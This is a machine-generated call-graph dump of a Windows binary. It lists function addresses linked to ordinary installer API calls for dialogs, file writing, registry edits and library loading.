4486 401511 4484->4486 4485->4482 4486->4487 4488 401541 RegDeleteKeyW 4486->4488 4487->4472 4488->4487 4489 4040e4 4490 4040ff 4489->4490 4496 40422d 4489->4496 4492 40413a 4490->4492 4520 403ff6 WideCharToMultiByte 4490->4520 4491 404298 4493 40436a 4491->4493 4494 4042a2 GetDlgItem 4491->4494 4500 403d6b 19 API calls 4492->4500 4501 403df6 8 API calls 4493->4501 4497 40432b 4494->4497 4498 4042bc 4494->4498 4496->4491 4496->4493 4499 404267 GetDlgItem SendMessageW 4496->4499 4497->4493 4502 40433d 4497->4502 4498->4497 4506 4042e2 6 API calls 4498->4506 4525 403db1 KiUserCallbackDispatcher 4499->4525 4504 40417a 4500->4504 4505 404365 4501->4505 4507 404353 4502->4507 4508 404343 SendMessageW 4502->4508 4510 403d6b 19 API calls 4504->4510 4506->4497 4507->4505 4511 404359 SendMessageW 4507->4511 4508->4507 4509 404293 4512 403d8d SendMessageW 4509->4512 4513 404187 CheckDlgButton 4510->4513 4511->4505 4512->4491 4523 403db1 KiUserCallbackDispatcher 4513->4523 4515 4041a5 GetDlgItem 4524 403dc4 SendMessageW 4515->4524 4517 4041bb SendMessageW 4518 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4517->4518 4519 4041d8 GetSysColor 4517->4519 4518->4505 4519->4518 4521 404033 4520->4521 4522 404015 GlobalAlloc WideCharToMultiByte 4520->4522 4521->4492 4522->4521 4523->4515 4524->4517 4525->4509 4526 402ae4 4527 402aeb 4526->4527 4528 4030e3 4526->4528 4529 402af2 CloseHandle 4527->4529 4529->4528 4530 402065 4531 401446 18 API calls 4530->4531 4532 40206d 4531->4532 4533 401446 18 API calls 4532->4533 4534 402076 GetDlgItem 4533->4534 4535 4030dc 4534->4535 4536 4030e3 4535->4536 4538 405f7d wsprintfW 4535->4538 4538->4536 4539 402665 4540 40145c 18 API calls 4539->4540 4541 40266b 4540->4541 4542 40145c 18 API calls 4541->4542 4543 402674 4542->4543 4544 40145c 18 API calls 4543->4544 4545 40267d 4544->4545 4546 4062cf 11 API calls 4545->4546 4547 40268c 4546->4547 4548 406301 2 API calls 4547->4548 4549 402695 4548->4549 4550 4026a6 lstrlenW lstrlenW 4549->4550 4552 404f9e 25 API calls 4549->4552 4554 4030e3 4549->4554 4551 404f9e 25 API calls 4550->4551 4553 4026e8 SHFileOperationW 4551->4553 4552->4549 4553->4549 4553->4554 4555 401c69 4556 40145c 18 API calls 4555->4556 4557 401c70 4556->4557 4558 4062cf 11 API calls 4557->4558 4559 401c80 4558->4559 4560 405ccc MessageBoxIndirectW 4559->4560 4561 401a13 4560->4561 4562 402f6e 4563 402f72 4562->4563 4564 402fae 4562->4564 4566 4062cf 11 API calls 4563->4566 4565 40145c 18 API calls 4564->4565 4572 402f9d 4565->4572 4567 402f7d 4566->4567 4568 4062cf 11 API calls 4567->4568 4569 402f90 4568->4569 4570 402fa2 4569->4570 4571 402f98 4569->4571 4574 406113 9 API calls 4570->4574 4573 403ea0 5 API calls 4571->4573 4573->4572 4574->4572 4575 4023f0 4576 402403 4575->4576 4577 4024da 4575->4577 4578 40145c 18 API calls 4576->4578 4579 404f9e 25 API calls 4577->4579 4580 40240a 4578->4580 4583 4024f1 4579->4583 4581 40145c 18 API calls 4580->4581 4582 402413 4581->4582 4584 402429 LoadLibraryExW 4582->4584 4585 40241b GetModuleHandleW 4582->4585 4586 4024ce 4584->4586 4587 40243e 4584->4587 4585->4584 4585->4587 4589 404f9e 25 API calls 4586->4589 4599 406391 GlobalAlloc WideCharToMultiByte 4587->4599 4589->4577 4590 402449 4591 40248c 4590->4591 4592 40244f 4590->4592 4593 404f9e 25 API calls 4591->4593 4594 401435 25 API calls 4592->4594 4597 40245f 4592->4597 4595 402496 4593->4595 4594->4597 4596 4062cf 11 API calls 4595->4596 4596->4597 4597->4583 4598 4024c0 FreeLibrary 4597->4598 4598->4583 4600 4063c9 GlobalFree 4599->4600 4601 4063bc GetProcAddress 4599->4601 4600->4590 4601->4600 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4602 4048f8 4603 404906 4602->4603 4604 40491d 4602->4604 4605 40490c 4603->4605 4620 404986 4603->4620 4606 40492b IsWindowVisible 4604->4606 4612 404942 4604->4612 4607 403ddb SendMessageW 4605->4607 4609 404938 4606->4609 4606->4620 4610 404916 4607->4610 4608 40498c CallWindowProcW 4608->4610 4621 40487a SendMessageW 4609->4621 4612->4608 4626 406035 lstrcpynW 4612->4626 4614 404971 4627 405f7d wsprintfW 4614->4627 4616 404978 4617 40141d 80 API calls 4616->4617 4618 40497f 4617->4618 4628 406035 lstrcpynW 4618->4628 4620->4608 4622 4048d7 SendMessageW 4621->4622 4623 40489d GetMessagePos ScreenToClient SendMessageW 4621->4623 4625 4048cf 4622->4625 4624 4048d4 4623->4624 4623->4625 4624->4622 4625->4612 4626->4614 4627->4616 4628->4620 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4629 4020f9 GetDC GetDeviceCaps 4630 401446 18 API calls 4629->4630 4631 402116 MulDiv 4630->4631 4632 401446 18 API calls 4631->4632 4633 40212c 4632->4633 4634 406831 18 API calls 4633->4634 4635 402165 CreateFontIndirectW 4634->4635 4636 4030dc 4635->4636 4637 4030e3 4636->4637 4639 405f7d wsprintfW 4636->4639 4639->4637 4640 4024fb 4641 40145c 18 API calls 4640->4641 4642 402502 4641->4642 4643 40145c 18 API calls 4642->4643 4644 40250c 4643->4644 4645 40145c 18 API calls 4644->4645 4646 402515 4645->4646 4647 40145c 18 API calls 4646->4647 4648 40251f 4647->4648 4649 40145c 18 API calls 4648->4649 4650 402529 4649->4650 4651 40253d 4650->4651 4652 40145c 18 API calls 4650->4652 4653 4062cf 11 API calls 4651->4653 4652->4651 4654 40256a CoCreateInstance 4653->4654 4655 40258c 4654->4655 4656 4026fc 4658 402708 4656->4658 4659 401ee4 4656->4659 4657 406831 18 API calls 4657->4659 4659->4656 4659->4657 4660 4019fd 4661 40145c 18 API calls 4660->4661 4662 401a04 4661->4662 4663 405eab 2 API calls 4662->4663 4664 401a0b 4663->4664 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3808 401a1f 3809 40145c 18 API calls 3808->3809 3810 401a26 3809->3810 3811 4062cf 11 API calls 3810->3811 3812 401a49 3811->3812 3813 401a64 3812->3813 3814 401a5c 3812->3814 3883 406035 lstrcpynW 3813->3883 3882 406035 lstrcpynW 3814->3882 3817 401a6f 3884 40674e lstrlenW CharPrevW 3817->3884 3818 401a62 3821 406064 5 API calls 3818->3821 3852 401a81 3821->3852 3822 406301 2 API calls 3822->3852 3825 401a98 CompareFileTime 3825->3852 3826 401ba9 3827 404f9e 25 API calls 3826->3827 3829 401bb3 3827->3829 3828 401b5d 3830 404f9e 25 API calls 3828->3830 3861 40337f 3829->3861 3832 401b70 3830->3832 3836 4062cf 11 API calls 3832->3836 3834 406035 lstrcpynW 3834->3852 3835 4062cf 11 API calls 3837 401bda 3835->3837 3841 401b8b 3836->3841 3838 401be9 SetFileTime 3837->3838 3839 401bf8 CloseHandle 3837->3839 3838->3839 3839->3841 3842 401c09 3839->3842 3840 406831 18 API calls 3840->3852 3843 401c21 3842->3843 3844 401c0e 3842->3844 3845 406831 18 API calls 3843->3845 3846 406831 18 API calls 3844->3846 3847 401c29 3845->3847 3849 401c16 lstrcatW 3846->3849 3850 4062cf 11 API calls 3847->3850 3849->3847 3853 401c34 3850->3853 3851 401b50 3855 401b93 3851->3855 3856 401b53 3851->3856 3852->3822 3852->3825 3852->3826 3852->3828 3852->3834 3852->3840 3852->3851 3854 4062cf 11 API calls 3852->3854 3860 405e7c GetFileAttributesW CreateFileW 3852->3860 3887 405e5c GetFileAttributesW 3852->3887 3890 405ccc 3852->3890 3857 405ccc MessageBoxIndirectW 3853->3857 3854->3852 3858 4062cf 11 API calls 3855->3858 3859 4062cf 11 API calls 3856->3859 3857->3841 3858->3841 3859->3828 3860->3852 3862 40339a 3861->3862 3863 4033c7 3862->3863 3896 403368 SetFilePointer 3862->3896 3894 403336 ReadFile 3863->3894 3867 401bc6 3867->3835 3868 403546 3870 40354a 3868->3870 3871 40356e 3868->3871 3869 4033eb GetTickCount 3869->3867 3874 403438 3869->3874 3872 403336 ReadFile 3870->3872 3871->3867 3875 403336 ReadFile 3871->3875 3876 40358d WriteFile 3871->3876 3872->3867 3873 403336 ReadFile 3873->3874 3874->3867 3874->3873 3878 40348a GetTickCount 3874->3878 3879 4034af MulDiv wsprintfW 3874->3879 3881 4034f3 WriteFile 3874->3881 3875->3871 3876->3867 3877 4035a1 3876->3877 3877->3867 3877->3871 3878->3874 3880 404f9e 25 API calls 3879->3880 3880->3874 3881->3867 3881->3874 3882->3818 3883->3817 3885 401a75 lstrcatW 3884->3885 3886 40676b lstrcatW 3884->3886 3885->3818 3886->3885 3888 405e79 3887->3888 3889 405e6b SetFileAttributesW 3887->3889 3888->3852 3889->3888 3891 405ce1 3890->3891 3892 405d2f 3891->3892 3893 405cf7 MessageBoxIndirectW 3891->3893 3892->3852 3893->3892 3895 403357 3894->3895 3895->3867 3895->3868 3895->3869 3896->3863 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 